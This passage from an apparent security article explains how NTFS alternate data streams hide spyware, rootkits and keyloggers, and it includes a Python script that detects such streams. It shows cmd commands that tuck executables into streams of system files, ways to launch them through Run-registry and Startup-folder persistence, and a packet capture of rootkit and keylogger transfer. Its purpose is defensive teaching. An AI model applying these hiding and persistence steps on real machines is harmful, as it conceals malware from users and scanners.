The data that exists in an alternate stream cannot be deleted in the same way as data in a primary stream. Each data stream has its own lock attributes, but Windows only pays attention to the lock on the unnamed stream. This creates a vulnerability in which an ADS can be created and edited while remaining protected from discovery or removal by ADS scanning applications.

The data in an ADS can also be directly executed. At least five ways to execute different types of data are known for Windows 2000. The following scenarios are possible:

  • Executing the stream from the Run window as file:\\notepad.exe: works for the .exe stream and the .vbs stream.

  • Executing the Visual Basic script from the command line using the Windows Scripting Host by running wscript notepad.exe:.

  • Creating a shortcut to notepad.exe: will execute both the .exe and .vbs streams.

  • Placing a shortcut to the stream in the Windows Startup folder will cause the .exe and .vbs streams to be executed when a user logs in.

  • Adding a test key with value notepad.exe in HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run will cause .exe and .vbs streams to be executed on system startup.

Creators of spyware (for example variants of CoolWebSearch) use this kind of technique to hide their malicious code in ADSs. It's very easy to perform, no special tools are needed, a user only needs a stream-aware tool like Notepad to edit/add data.

A practical example

To start with a very simple example:

> type c:\spyware.exe > c:\winnt\system32\notepad.exe:spyware.exe

will attach the file to the common Notepad program as an ADS named spyware.exe.

Another example:

> cd C:\
> copy C:\winnt\notepad.exe C:\notepad.exe
> edit C:\randumb.txt
> type notepad.exe > randumb.txt:nd.exe

now you can still execute that notepad.exe program from within the text file:

> start C:\randumb.txt:nd.exe

Crackers can also use this technique to install rootkits and keyloggers on Windows machines after obtaining a remote shell on the 0wn3d box. Using TFTP, the following files are transferred to an innocent-looking directory C:\WUTemp$dir. An analysis of the stream with tcpdump can be seen in Listing 6.

Listing 6. Malicious software distributed via ADS

10.0.0.75.1032 > 10.0.0.77.3733: P [tcp sum ok] 3530256009:3530256512(503) ack 758422019 win 17303
0x0000     4500 021f 02df 4000 8006 71de c0a8 0165    E.....@...q....e
0x0010     c0a8 0166 0406 10e1 d26b 6e89 2d34 9a03    ...f.....kn.-4..
0x0020     5018 4397 e869 0000 0d0a 3132 2f30 352f    P.C..i....23/09/
0x0030     3230 3034 2020 3039 3a33 3061 2020 2020    2005..22:09a....
0x0040     2020 2020 2020 2020 2020 3332 2c37 3638    ..........32,768
0x0050     2069 7065 7965 2e65 7865 0d0a 3132 2f30    rootkit.exe.23/0
0x0060     352f 3230 3034 2020 3039 3a33 3261 2020    9/2005..22:09a..
0x0070     2020 2020 2020 2020 2020 2020 3332 2c37    ............32,7
0x0080     3638 206b 6c6f 6767 6572 2e65 7865 0d0a    68.keylogger.exe
 

The C:\WUTemp$dir directory contains a file called wutest. An attacker then copies the tools into this file to hide them in an alternate data stream:

> type spyware.exe > wutest:spyware.exe

It is also possible to copy a file into the stream of a directory, such as simply C:\. There are many ways in which an attacker can start programs, such as batch-scripts or the start-command. Recent honeypot analysis shows such attacks being in common use lately.

How to detect/avoid/remove

Unfortunately, Microsoft doesn't provide any tools to detect Alternate Data Streams. There is however third-party software available such as LADS or ADS spy (see Inset On the Net).

Let's see how we can detect and remove ADSs in practice. First, let's create an example stream:

> type c:\temp\spyware.exe.txt > c:\WINDOWS\system32\calc.exe:spyware.exe.txt

This creates an ADS in the file calc.exe, the calculator. Now let's run ADS spy - Figure 11 shows the results of a system scan. As we can see, ADS spy detected the stream and by selecting it, we can easily remove it using this tool. It's difficult to avoid ADSs, but more and more antivirus vendors are upgrading their tools to enable ADS detection.

Figure 11. Detecting ADSs using ADS spy
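What LADS and ADS spy do can also be scripted against the Win32 API, which is useful for sweeping a whole volume on a schedule. The following Python script is an added example, not the article's code and not part of either tool: it enumerates every data stream of a file with the kernel32 functions FindFirstStreamW/FindNextStreamW through ctypes and reports those that are not the unnamed stream. One caveat a practitioner should know: these API calls exist from Windows Server 2003 and Windows Vista onward, so they do not cover the Windows 2000 hosts the article discusses, where a third-party tool remains necessary. The stream-name filter is platform-independent and is exercised here on constructed names, including the Zone.Identifier stream that Internet Explorer itself writes and that a sweep must not mistake for malware.

```python
import ctypes
import sys


def alternate_streams(stream_names) -> list:
    """Keep only the alternate data streams from an enumeration result.

    Stream names come back as "::$DATA" for the unnamed (primary) stream and
    ":<name>:$DATA" for every alternate data stream of the file.
    """
    return [s for s in stream_names if s != "::$DATA" and s.upper().endswith(":$DATA")]


def list_streams(path: str) -> list:
    """Enumerate all NTFS data streams of a file via FindFirstStreamW (Windows only)."""
    if sys.platform != "win32":
        raise OSError("NTFS stream enumeration needs the Win32 API")

    class WIN32_FIND_STREAM_DATA(ctypes.Structure):
        _fields_ = [("StreamSize", ctypes.c_longlong),
                    ("cStreamName", ctypes.c_wchar * (260 + 36))]   # MAX_PATH + 36

    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.FindFirstStreamW.argtypes = [ctypes.c_wchar_p, ctypes.c_int,
                                     ctypes.POINTER(WIN32_FIND_STREAM_DATA), ctypes.c_ulong]
    k32.FindFirstStreamW.restype = ctypes.c_ssize_t   # INVALID_HANDLE_VALUE reads as -1
    k32.FindNextStreamW.argtypes = [ctypes.c_ssize_t, ctypes.POINTER(WIN32_FIND_STREAM_DATA)]
    k32.FindNextStreamW.restype = ctypes.c_int
    k32.FindClose.argtypes = [ctypes.c_ssize_t]
    k32.FindClose.restype = ctypes.c_int

    data = WIN32_FIND_STREAM_DATA()
    handle = k32.FindFirstStreamW(path, 0, ctypes.byref(data), 0)   # 0 = FindStreamInfoStandard
    if handle == -1:
        raise ctypes.WinError(ctypes.get_last_error())
    names = []
    try:
        names.append(data.cStreamName)
        while k32.FindNextStreamW(handle, ctypes.byref(data)):
            names.append(data.cStreamName)
    finally:
        k32.FindClose(handle)
    return names


# Constructed enumeration result for a file carrying the stream created above
# plus the Zone.Identifier stream that Internet Explorer writes on downloads.
SAMPLE_ENUMERATION = ["::$DATA", ":spyware.exe.txt:$DATA", ":Zone.Identifier:$DATA"]

if __name__ == "__main__":
    targets = sys.argv[1:]
    for target in targets:
        for stream in alternate_streams(list_streams(target)):
            print(f"{target}{stream}")
    if not targets:
        print(alternate_streams(SAMPLE_ENUMERATION))
```

Run with file paths as arguments on a Windows host, the script prints each alternate stream as `path:name:$DATA`, the same notation the cmd examples above use to write into a stream; a stream found on calc.exe or notepad.exe is worth the same attention as a new file in System32.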

 

Conclusion

To solve spyware problems, anti-spyware software is not enough. An ideal package is not available, so it's best to use a combination of anti-spyware programs from well-known vendors. Of course, keeping the OS updated is also key to success. In some specific cases, third party tools are necessary to fix problems.

On the other hand, can we really stop spyware? Since spyware is a very lucrative business, the battle between writers and defenders will continue, both using and developing new techniques to defeat each other.